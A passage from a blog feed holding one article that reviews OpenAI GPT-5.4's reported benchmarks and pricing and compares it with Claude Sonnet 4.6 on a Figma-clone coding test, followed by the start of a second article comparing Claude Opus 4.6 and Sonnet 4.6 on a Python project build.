      &lt;a class="ltag__user__link" href="/shricodev"&gt;Full Stack SDE • Open-Source Contributor • Collaborator @Oppia • Mail for collaboration&lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;



</description>
      <category>ai</category>
      <category>productivity</category>
      <category>openclaw</category>
      <category>tutorial</category>
    </item>
    <item>
      <title>Everything you need to know about OpenAI GPT-5.4 ✌️</title>
      <dc:creator>Shrijal Acharya</dc:creator>
      <pubDate>Sat, 21 Mar 2026 14:08:05 +0000</pubDate>
      <link>https://forem.com/tensorlake/everything-you-need-to-know-about-openai-gpt-54-3lgm</link>
      <guid>https://forem.com/tensorlake/everything-you-need-to-know-about-openai-gpt-54-3lgm</guid>
      <description>&lt;p&gt;OpenAI’s new GPT-5.4 is here, and on paper at least, it looks like one of their strongest all-rounder models so far.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fg2rrzzlrqx2wc2szp0do.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fg2rrzzlrqx2wc2szp0do.png" alt="GPT 5.4 release blog"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  TL;DR
&lt;/h2&gt;

&lt;p&gt;In this article, we take a quick look at OpenAI GPT-5.4, go through its official benchmarks, and then compare it in one small coding task against Anthropic’s general-purpose model, Claude Sonnet 4.6, to see how it actually performs.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;We briefly go over what GPT-5.4 is, what OpenAI is claiming with this model, and why it looks like one of their strongest all-rounder releases so far.&lt;/li&gt;
&lt;/ul&gt;



&lt;ul&gt;
&lt;li&gt;We look at the official benchmarks around coding, reasoning, tool use, and computer-use capabilities to get an idea of how strong the model looks on paper.&lt;/li&gt;
&lt;/ul&gt;



&lt;ul&gt;
&lt;li&gt;Instead of relying only on benchmarks, we also compare GPT-5.4 against Claude Sonnet 4.6 in one small, quick coding task (not enough to judge fully, but still...).&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Brief on OpenAI GPT-5.4
&lt;/h2&gt;

&lt;p&gt;So, before we jump into the coding test, let me give you a quick brief on GPT-5.4, because this is one of OpenAI’s biggest model releases in a while.&lt;/p&gt;

&lt;p&gt;OpenAI released GPT-5.4 on March 5, 2026, and they are positioning it as their most capable and efficient frontier model for professional work.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgjgdtgurct57gfvfsblk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgjgdtgurct57gfvfsblk.png" alt="OpenAI claiming gpt 5.4 is good at frontend"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;What makes this model interesting is that OpenAI is not selling it as just a coding model, and not just a reasoning model either. They are basically pitching it as an &lt;strong&gt;all-round professional work&lt;/strong&gt; model that combines strong reasoning, strong coding, better tool use, and much better performance on practical work like spreadsheets, presentations, etc.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkfmlidftq907s3rk2c1l.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkfmlidftq907s3rk2c1l.png" alt="Sam Altman claiming the model is good at real life tasks like working with spreadsheets"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Honestly, this part matters more than it sounds. A lot of real AI work is not just prompting or writing code, it is dealing with PDFs, spreadsheets, slides, and all kinds of unstructured data. That is also where something like &lt;a href="https://tensorlake.ai" rel="noopener noreferrer"&gt;Tensorlake&lt;/a&gt; makes sense, because it helps turn that mess into something models can actually work with.&lt;/p&gt;

&lt;p&gt;And the specs are also pretty wild. GPT-5.4 supports a &lt;strong&gt;1.05M token&lt;/strong&gt; context window with 128K max output tokens, which gives it plenty of room to keep long documents and conversations in context. Also, a thing to note is that the knowledge cutoff for this model is &lt;strong&gt;August 31, 2025&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Now, let's talk about the part we mostly care about.&lt;/p&gt;

&lt;p&gt;On the official OpenAI benchmarks, &lt;strong&gt;GPT-5.4 scores 57.7% on SWE-Bench Pro (Public)&lt;/strong&gt;, which puts it basically side by side with the coding-focused GPT-5.3-Codex at &lt;strong&gt;56.8%&lt;/strong&gt;. So yes, OpenAI says this general-purpose model slightly edges out their dedicated coding model (which, personally, I have not had the best experience with compared to Claude models), and that is kind of wild to think about.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fn6yjg9ftpq3vexntmndl.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fn6yjg9ftpq3vexntmndl.png" alt="gpt 5.4 benchmark"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;OpenAI says GPT-5.4 is their &lt;strong&gt;first general-purpose model with native computer-use capabilities&lt;/strong&gt;, which is a pretty big deal. That means it is built not just to generate text or code, but also to operate across software, work from screenshots, and handle more agent-like workflows. On &lt;strong&gt;OSWorld-Verified&lt;/strong&gt;, it scores &lt;strong&gt;75.0%&lt;/strong&gt;, which OpenAI says is above human performance on that benchmark. 🤯&lt;/p&gt;

&lt;p&gt;One thing I also like here is that OpenAI is claiming GPT-5.4 is their &lt;strong&gt;most factual model yet&lt;/strong&gt;. Its responses are said to be 18% less likely to contain factual errors than GPT-5.2's.&lt;/p&gt;

&lt;p&gt;For API developers, pricing matters, of course.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fv5667dzgr6es7701tau2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fv5667dzgr6es7701tau2.png" alt="gpt 5.4 pricing"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The standard &lt;strong&gt;GPT-5.4&lt;/strong&gt; model is listed at &lt;strong&gt;$2.50 per 1M input tokens&lt;/strong&gt;, &lt;strong&gt;$0.25 cached input&lt;/strong&gt;, and &lt;strong&gt;$15 per 1M output tokens&lt;/strong&gt;. &lt;strong&gt;GPT-5.4 Pro&lt;/strong&gt; is way more expensive at &lt;strong&gt;$30 input&lt;/strong&gt; and &lt;strong&gt;$180 output per 1M tokens&lt;/strong&gt;, and OpenAI says it can take several minutes on hard tasks, so that one is clearly for cases where you really want the best answer and are okay paying for it.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💁 The normal GPT-5.4 model is probably the one most people will actually care about day to day, and that's what I'd prefer.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;And as always, benchmarks are benchmarks. But on paper at least, GPT-5.4 looks like one of the strongest all-rounder models OpenAI has shipped so far.&lt;/p&gt;




&lt;h2&gt;
  
  
  Quick Coding Test
&lt;/h2&gt;

&lt;p&gt;As this is a general-purpose model instead of a coding-tuned model, comparing the model's ability solely on coding is just not fair. But as developers, we mostly care about how good the model is at coding anyway, so just to give you an idea of how this model performs, we will do a quick test.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6l1l9xllt29e4rzqakqa.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6l1l9xllt29e4rzqakqa.png" alt="gpt 5.4 benchmark compared to 5.3 codex"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;As you can see, there's not much difference in SWE-Bench between GPT-5.4 and GPT-5.3-Codex:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;GPT-5.4&lt;/strong&gt;: Latency (s): 1,053, Accuracy: 57.7%, Effort: xhigh&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;GPT-5.3-Codex&lt;/strong&gt;: Latency (s): 1,114, Accuracy: 57.2%, Effort: xhigh&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;But to give you an idea of what to expect from this model in coding, I will run one small, quick test.&lt;/p&gt;

&lt;p&gt;Let's take two general models, one from Anthropic, Claude Sonnet 4.6, and one from OpenAI, GPT-5.4, &lt;strong&gt;not pro&lt;/strong&gt;, and compare them against each other to show the difference in their coding skills.&lt;/p&gt;

&lt;p&gt;For the test, we will use the following CLI coding agents:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Claude Sonnet 4.6:&lt;/strong&gt; Claude Code (Anthropic’s terminal-based agentic coding tool)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;OpenAI GPT-5.4:&lt;/strong&gt; Codex CLI&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;As GPT-5.4 is said to be strong in frontend, why not test it on frontend itself?&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fa3mnuibaxl0c6acx4npd.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fa3mnuibaxl0c6acx4npd.png" alt="gpt 5.4 frontend claim"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Test: Figma Design Clone with MCP
&lt;/h3&gt;

&lt;p&gt;In this test, we'll be comparing both models on a Figma design, a complex dashboard with a lot going on in the UI.&lt;/p&gt;

&lt;p&gt;Here's the prompt I'll give both models, including the Figma design to clone:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight markdown"&gt;&lt;code&gt;Prompt:

Build a &lt;span class="gs"&gt;**pixel-accurate clone**&lt;/span&gt; of the attached Figma design frame using the &lt;span class="gs"&gt;**provided Next.js project**&lt;/span&gt; as the starting point. Do &lt;span class="gs"&gt;**not**&lt;/span&gt; create a new project. Instead, implement the UI inside the existing codebase.

https://www.figma.com/design/8quNKljV0spv67VAGsA75D/Dashboard-Design-Concept--Community---Copy-?node-id=69-123&amp;amp;t=Tvu2UB7UDMqkvPRb-4

Please match the design as closely as possible, with close attention to layout, spacing, alignment, typography, colors, borders, shadows, corner radius, and overall visual balance.

Requirements:
&lt;span class="p"&gt;
*&lt;/span&gt; use the existing &lt;span class="gs"&gt;**Next.js**&lt;/span&gt; setup
&lt;span class="p"&gt;*&lt;/span&gt; keep the code clean and componentized
&lt;span class="p"&gt;*&lt;/span&gt; make the page responsive without changing the intended design
&lt;span class="p"&gt;*&lt;/span&gt; use semantic HTML where appropriate
&lt;span class="p"&gt;*&lt;/span&gt; avoid adding your own design decisions unless necessary
&lt;span class="p"&gt;*&lt;/span&gt; if any part of the design is unclear, make the most reasonable choice and stay visually consistent

Prioritize &lt;span class="gs"&gt;**design accuracy first**&lt;/span&gt;, then code quality.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h4&gt;
  
  
  GPT-5.4
&lt;/h4&gt;

&lt;p&gt;GPT-5.4 pretty much one-shotted the entire implementation, which was honestly nice to see. It did not need any follow-up prompt, no fixing, nothing. It just took the Figma frame through MCP and started building the whole thing right away.&lt;/p&gt;

&lt;p&gt;The final result actually looked decent. I would not call it pixel-perfect by any means, but compared to Claude Sonnet 4.6, I’d say the implementation looked noticeably better overall. That said, the whole thing still feels more like a static picture of the design than an interface you can actually interact with.&lt;/p&gt;

&lt;p&gt;Time-wise, it took roughly &lt;strong&gt;5 minutes&lt;/strong&gt; to get to a working build.&lt;/p&gt;

&lt;p&gt;Here’s the demo:&lt;/p&gt;

&lt;p&gt;  &lt;iframe src="https://www.youtube.com/embed/4yxzh0qxm5c"&gt;
  &lt;/iframe&gt;
&lt;/p&gt;

&lt;p&gt;You can find the code it generated here: &lt;a href="https://gist.github.com/shricodev/f6edd67c32037c0a69def1b10985855d" rel="noopener noreferrer"&gt;GPT-5.4 Code&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Token usage looked like this:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Total Token Usage:&lt;/strong&gt; 166,501&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Input Token Usage:&lt;/strong&gt; 151,595&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cached Input Tokens:&lt;/strong&gt; 1,291,776&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Output Token Usage:&lt;/strong&gt; 14,906&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Reasoning Tokens:&lt;/strong&gt; 1,479&lt;/li&gt;
&lt;/ul&gt;
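&lt;p&gt;Plugging those numbers into the pricing listed above ($2.50/M input, $0.25/M cached input, $15/M output) gives a rough cost for the run. This assumes cached input is billed separately at the cached rate, which may not exactly match OpenAI's actual billing:&lt;/p&gt;

```python
# Rough cost estimate for the Codex CLI run above, using the listed
# GPT-5.4 rates. Assumption: cached input is billed separately at the
# cached rate, on top of the regular input tokens.

PRICES = {  # USD per 1M tokens, from the pricing section
    "input": 2.50,
    "cached_input": 0.25,
    "output": 15.00,
}

def estimate_cost(input_toks: int, cached_toks: int, output_toks: int) -> float:
    """Estimated USD cost for one run."""
    return (
        input_toks / 1e6 * PRICES["input"]
        + cached_toks / 1e6 * PRICES["cached_input"]
        + output_toks / 1e6 * PRICES["output"]
    )

# Token counts from the run above
cost = estimate_cost(input_toks=151_595, cached_toks=1_291_776, output_toks=14_906)
print(f"~${cost:.2f}")  # roughly $0.93 under these assumptions
```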

&lt;p&gt;And the following code changes:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Code Changes:&lt;/strong&gt; 3 files changed, 803 insertions(+), 82 deletions(-)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;To be honest, I still would not say this is the kind of code implementation you can just ship straight to production and call it done. But for a one-shot frontend clone from a Figma frame, this was a pretty solid attempt.&lt;/p&gt;
&lt;h4&gt;
  
  
  Claude Sonnet 4.6
&lt;/h4&gt;

&lt;p&gt;Claude Sonnet 4.6 went straight into the implementation right away. It did run into an issue at first, not really a build error, but more of one of those annoying &lt;strong&gt;Next.js image gotchas&lt;/strong&gt;:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0kdi2h66gcdz807p0kom.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0kdi2h66gcdz807p0kom.png" alt="claude sonnet 4.6 image impl error"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After that, I gave it a quick follow-up prompt, and almost instantly, it fixed the issue and came back with a decent implementation.&lt;/p&gt;

&lt;p&gt;As you’d expect, it did manage to clone the project structure and get the UI in place. But again, same issue: there's just no functionality whatsoever. It feels like a picture with no interactivity.&lt;/p&gt;

&lt;p&gt;Here’s the demo:&lt;/p&gt;

&lt;p&gt;  &lt;iframe src="https://www.youtube.com/embed/L9l8cGBvC1U"&gt;
  &lt;/iframe&gt;
&lt;/p&gt;

&lt;p&gt;You can find the code it generated here: &lt;a href="https://gist.github.com/shricodev/61d485a452f2aab8eb41ceaa31ddd9f9" rel="noopener noreferrer"&gt;Claude Sonnet 4.6 Code&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Time-wise, it took &lt;strong&gt;9 minutes 56 seconds&lt;/strong&gt; to get to a working result, and the follow-up fix was pretty much instant.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fq0ugjnobb005rsla4bnr.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fq0ugjnobb005rsla4bnr.png" alt="implementation checklist"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Token usage, based on Claude Code’s model stats, looked like this:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Input Token Usage:&lt;/strong&gt; 84&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Output Token Usage:&lt;/strong&gt; 35.4K&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgof5gb4r1ufiy1vpwpa4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgof5gb4r1ufiy1vpwpa4.png" alt="token usage"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And the following code changes:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Code Changes:&lt;/strong&gt; 10 files changed, 1017 insertions(+), 84 deletions(-)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;To be honest, I’m not really impressed, but I’m not disappointed either. The result feels pretty neutral overall. It was able to use tools, get fairly close to the UI, and produce something usable for comparison, but the implementation itself feels a bit weird and not all that convincing.&lt;/p&gt;


&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;So, after all the benchmarks, claims, and hype, I think the fairest takeaway is this: GPT-5.4 looks very strong on paper, and for a lot of people it will be a genuine upgrade, but it still doesn’t seem like the best model you can get for coding.&lt;/p&gt;

&lt;p&gt;So yeah, I’d say GPT-5.4 is probably one of the strongest all-rounder models OpenAI has shipped so far, but whether it beats Claude, be it Sonnet or Opus, for coding in real usage is still something you’ll want to judge from your actual hands-on testing, not just benchmarks.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5t6hnxig38el1bsey06l.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5t6hnxig38el1bsey06l.gif" alt="slect random gif"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And honestly, that’s the real takeaway here anyway.&lt;/p&gt;

&lt;p&gt;These models keep getting better at a speed that is honestly hard to keep up with. So rather than getting too stuck on who won one benchmark, the better thing to do is probably to keep building, keep testing, and keep learning how to use these models better for your use case.&lt;/p&gt;

&lt;p&gt;What do you think, is GPT-5.4 actually that good, or is Claude still your go-to? 👇&lt;/p&gt;


&lt;div class="ltag__user ltag__user__id__1127015"&gt;
    &lt;a href="/shricodev" class="ltag__user__link profile-image-link"&gt;
      &lt;div class="ltag__user__pic"&gt;
        &lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1127015%2F1c5e48a2-f602-4e7d-8312-3c0322d155c6.jpg" alt="shricodev image"&gt;
      &lt;/div&gt;
    &lt;/a&gt;
  &lt;div class="ltag__user__content"&gt;
    &lt;h2&gt;
&lt;a class="ltag__user__link" href="/shricodev"&gt;Shrijal Acharya&lt;/a&gt;Follow
&lt;/h2&gt;
    &lt;div class="ltag__user__summary"&gt;
      &lt;a class="ltag__user__link" href="/shricodev"&gt;Full Stack SDE • Open-Source Contributor • Collaborator @Oppia • Mail for collaboration&lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;



</description>
      <category>ai</category>
      <category>programming</category>
      <category>productivity</category>
      <category>webdev</category>
    </item>
    <item>
      <title>🔥Claude Opus 4.6 vs. Sonnet 4.6 Coding Comparison ✅</title>
      <dc:creator>Shrijal Acharya</dc:creator>
      <pubDate>Thu, 05 Mar 2026 14:04:59 +0000</pubDate>
      <link>https://forem.com/tensorlake/claude-opus-46-vs-sonnet-46-coding-comparison-55jn</link>
      <guid>https://forem.com/tensorlake/claude-opus-46-vs-sonnet-46-coding-comparison-55jn</guid>
      <description>&lt;p&gt;Anthropic recently dropped the updated &lt;strong&gt;Claude 4.6&lt;/strong&gt; lineup, and as usual, the two names everyone cares about are &lt;strong&gt;Opus 4.6&lt;/strong&gt; and &lt;strong&gt;Sonnet 4.6&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Opus is the expensive “best possible” model, and Sonnet is the cheaper, more general one that a lot of people actually use day to day. So I wanted to see what the real gap looks like when you ask both to build something serious, not a toy demo.&lt;/p&gt;

&lt;p&gt;Benchmark-wise, there’s a difference of course, but it doesn’t look that huge when it comes to SWE and agentic coding.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fumytppa0wbbydq6y6oxq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fumytppa0wbbydq6y6oxq.png" alt="Claude Opus 4.6 vs. Claude Sonnet 4.6 Benchmark comparison"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I kept it super basic: one test (but a big one), same prompt, same workflow. I just compared how close they got without me stepping in.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;⚠️ &lt;strong&gt;NOTE:&lt;/strong&gt; Don’t take the result of this test as a hard rule. This is just one real-world coding task, run in my setup, to give you a feel for how these two models performed for me.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  TL;DR
&lt;/h2&gt;

&lt;p&gt;If you just want the takeaway, here’s the deal with these models:&lt;/p&gt;

&lt;p&gt;First, &lt;strong&gt;Opus 4.6 is the peak for coding right now&lt;/strong&gt;. At the time of writing, it’s basically the OG, and nothing else comes that close.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Claude Opus 4.6&lt;/strong&gt; had a cleaner run. It hit a test failure too, but fixed it fast, shipped a working CLI + Tensorlake integration, and did it with way fewer tokens. Rough API-equivalent cost (output only) came out around ~$1.00, which is kind of wild for how big the project is.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Claude Sonnet 4.6&lt;/strong&gt; was surprisingly close for a cheaper, more general model. It built most of the project and the CLI was mostly fine, but it ran into the same issue as Opus and couldn’t fully recover. Even after an attempted fix, Tensorlake integration still didn’t work. Output-only cost was about ~$0.87, but it used way more time and tokens overall to get there.&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;💡 Obviously, this isn’t a test to “compare” the two head-to-head. It’s just to see the difference in code quality. In general, there’s never really been a fair comparison between Opus and Sonnet since their very first launch; Opus has always been on another level.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  Test Workflow
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ &lt;strong&gt;NOTE:&lt;/strong&gt; Before we start this test, I just want to clarify one thing. I'm not doing this test to compare whether Sonnet 4.6 is better than Opus 4.6 for coding, because obviously Opus 4.6 is a lot better. This is to give you an idea of how well Opus 4.6 performs compared to Sonnet.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;For the test, we will use everyone's favorite CLI coding agent, &lt;strong&gt;Claude Code&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;As both models are from Anthropic, it works best for both and is &lt;strong&gt;not biased&lt;/strong&gt; toward either.&lt;/p&gt;

&lt;p&gt;We will test both models on one decently complex task:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Task:&lt;/strong&gt; Build a complete Tensorlake project in Python called &lt;code&gt;research_pack&lt;/code&gt;, a “Deep Research Pack” generator that turns a topic into:&lt;/li&gt;
&lt;li&gt;a citation-backed &lt;strong&gt;Markdown report&lt;/strong&gt;, and&lt;/li&gt;
&lt;li&gt;a machine-readable &lt;strong&gt;source library JSON&lt;/strong&gt; with extracted text, metadata, summaries, you get the idea.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;It also has to ship a nice CLI called &lt;strong&gt;&lt;code&gt;research-pack&lt;/code&gt;&lt;/strong&gt; with commands like:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;code&gt;research-pack run "&amp;lt;topic&amp;gt;"&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;research-pack status &amp;lt;run_id&amp;gt;&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;research-pack open &amp;lt;run_id&amp;gt;&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
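&lt;p&gt;To make the CLI spec concrete, here's how I'd sketch that command surface with &lt;code&gt;argparse&lt;/code&gt;. This is just my own skeleton of the spec, not code either model produced, and the dispatch is a placeholder:&lt;/p&gt;

```python
# Skeleton of the `research-pack` CLI surface described above.
# Subcommand names come from the spec; the dispatch is a placeholder.
import argparse

def build_parser() -> argparse.ArgumentParser:
    parser = argparse.ArgumentParser(prog="research-pack")
    sub = parser.add_subparsers(dest="command", required=True)

    run = sub.add_parser("run", help="start a research run for a topic")
    run.add_argument("topic")

    status = sub.add_parser("status", help="check a run's progress")
    status.add_argument("run_id")

    open_cmd = sub.add_parser("open", help="open a finished run's report")
    open_cmd.add_argument("run_id")
    return parser

if __name__ == "__main__":
    args = build_parser().parse_args()
    print(f"{args.command}: {vars(args)}")  # placeholder dispatch
```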

&lt;p&gt;We’ll compare the overall feel, code quality, token usage, cost, and time to complete the build.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💡 &lt;strong&gt;NOTE:&lt;/strong&gt; Just like my previous tests, I’ll share each model’s changes as a &lt;code&gt;.patch&lt;/code&gt; file so you can reproduce the exact result locally with &lt;code&gt;git apply &amp;lt;file.patch&amp;gt;&lt;/code&gt;.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Why Tensorlake?
&lt;/h3&gt;

&lt;p&gt;Tensorlake is a solid choice for this Opus 4.6 vs Sonnet 4.6 test because it is a real platform with enough complexity to quickly show whether a model can actually build something end to end. It has an agent runtime with durable execution, sandboxed code execution, and built-in observability, so the test is not just writing a few functions; it is wiring up a production workflow.&lt;/p&gt;

&lt;p&gt;And selfishly, it is also a good dogfood moment. 👀 If a model can spin up a Tensorlake project from scratch and get it working, that is a pretty strong sign of two things: how scary good these recent models have gotten, and how usable Tensorlake is for building serious agent-style pipelines.&lt;/p&gt;




&lt;h2&gt;
  
  
  Coding Tests
&lt;/h2&gt;

&lt;h3&gt;
  
  
